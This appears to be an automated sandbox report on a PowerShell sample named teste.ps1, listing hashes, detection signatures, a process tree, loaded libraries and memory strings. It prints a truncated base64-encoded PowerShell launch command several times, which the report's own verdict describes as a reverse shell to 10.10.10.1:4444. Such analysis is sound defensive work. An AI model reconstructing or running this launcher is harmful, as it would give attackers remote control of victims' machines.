
Windows Analysis Report
teste.ps1

Overview

General Information

Sample name: teste.ps1
Analysis ID: 1675108
MD5: d43f3078147348d65e6d45b0dd8bb9b6
SHA1: 26d97115d6dad035bd6b2b3c14fa56871649e3ce
SHA256: b8f1effbb4aa7ce402352b78e0b8aa1245a1e47cf551ce9f15b8235a1d88cdf8
Tags: ps1, user-smica83

Detection

Score: 68
Range: 0 - 100
Confidence: 100%

Signatures

Malicious encrypted Powershell command line found
AI detected malicious Powershell script
Encrypted powershell cmdline option found
Joe Sandbox ML detected suspicious sample
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Suspicious Execution of Powershell with Base64
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

[Classification chart; categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner; scale: clean, suspicious, malicious]
  • System is w10x64
  • powershell.exe (PID: 7928 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 7968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8100 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e 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 MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • svchost.exe (PID: 7300 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e 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, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQA
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e 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, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQA
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3556, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1", ProcessId: 7928, ProcessName: powershell.exe
Source: Process started; Author: frack113; Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e 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, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAHQAcgAgAD0AIAAiAFQAYwBQACIAKwAiAEMAIgArACIAbABpACIAKwAiAGUAIgArACIAbgB0ACIAOwAkAHIAZQB2AGUAcgBzAGUAZAAgAD0AIAAtAGoAbwBpAG4AIAAoACQAcwB0AHIAWwAtADEALgAuAC0AKAAkAHMAdAByAC4ATABlAG4AZwB0AGgAKQBdACkAOwAKACQAUABKACAAPQAgAEAAKAAiADUANAAiACwAIAAiADQAMwAiACwAIAAiADUAMAAiACwAIAAiADQA
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3556, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1", ProcessId: 7928, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7300, ProcessName: svchost.exe
No Suricata rule has matched


AV Detection

Source: Submitted Sample; Neural Call Log Analysis: 92.5%

Phishing

Source: teste.ps1; Joe Sandbox AI: Found malicious Powershell script: High-risk reverse shell script with multiple malicious indicators: Base64 obfuscation of entire script, dynamic code execution (IEX), network connection to suspicious IP (10.10.10.1:4444), character manipulation to hide strings, uses System.Net.Sockets for raw TCP connection, and establishes interactive command shell. Classic command & control (C2) behavior.
Source: Binary string: ystem.pdb source: powershell.exe, 00000002.00000002.1374203986.00000000079B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000002.00000002.1373818769.000000000792B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb9; source: powershell.exe, 00000002.00000002.1369870772.000000000361F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000002.00000002.1374269211.00000000079C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000002.00000002.1369870772.000000000361F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1374269211.00000000079C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000002.00000002.1374269211.00000000079C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \System.pdb? source: powershell.exe, 00000002.00000002.1374203986.00000000079B2000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdb source: powershell.exe, 00000002.00000002.1374269211.00000000079C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5&:HnG source: powershell.exe, 00000002.00000002.1373818769.000000000792B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbk source: powershell.exe, 00000002.00000002.1374269211.00000000079C8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.1373818769.000000000792B000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: powershell.exe, 00000002.00000002.1373818769.000000000792B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microsoft
Source: svchost.exe, 00000003.00000002.2364387027.0000017795C00000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.ver)
Source: svchost.exe, 00000003.00000003.1203181729.0000017795B68000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: edb.log.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: edb.log.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 00000003.00000003.1203181729.0000017795B68000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 00000003.00000003.1203181729.0000017795B68000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 00000003.00000003.1203181729.0000017795B9D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr; String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: edb.log.3.dr; String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: powershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1370795804.00000000053E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1373818769.000000000795C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1377093945.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370795804.0000000005291000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1370795804.00000000053E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1373818769.000000000795C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.1377093945.0000000004BEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1377093945.0000000004BD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1370795804.0000000005291000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: svchost.exe, 00000003.00000003.1203181729.0000017795C12000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr; String found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
Source: edb.log.3.dr; String found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
Source: edb.log.3.dr; String found in binary or memory: https://g.live.com/odclientsettings/ProdV2
Source: edb.log.3.dr; String found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 00000003.00000003.1203181729.0000017795C12000.00000004.00000800.00020000.00000000.sdmp, edb.log.3.dr; String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: powershell.exe, 00000002.00000002.1370795804.00000000053E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1373818769.000000000795C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1372448375.00000000062FD000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 00000003.00000003.1203181729.0000017795C12000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.3.dr, edb.log.3.dr; String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.3.dr; String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:

E-Banking Fraud

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e 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
Source: C:\Windows\System32\svchost.exe; File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: Commandline size = 2627
Source: classification engine; Classification label: mal68.bank.evad.winPS1@5/12@0/2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Mutant created: NULL
Source: C:\Windows\System32\conhost.exe; Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5n0fy4d2.0kg.ps1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; File read: C:\Users\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: unknown; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\teste.ps1"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e 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
Source: unknown; Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: slc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: linkinfo.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ntshrui.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cscapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe; Section loaded: msasn1.dll
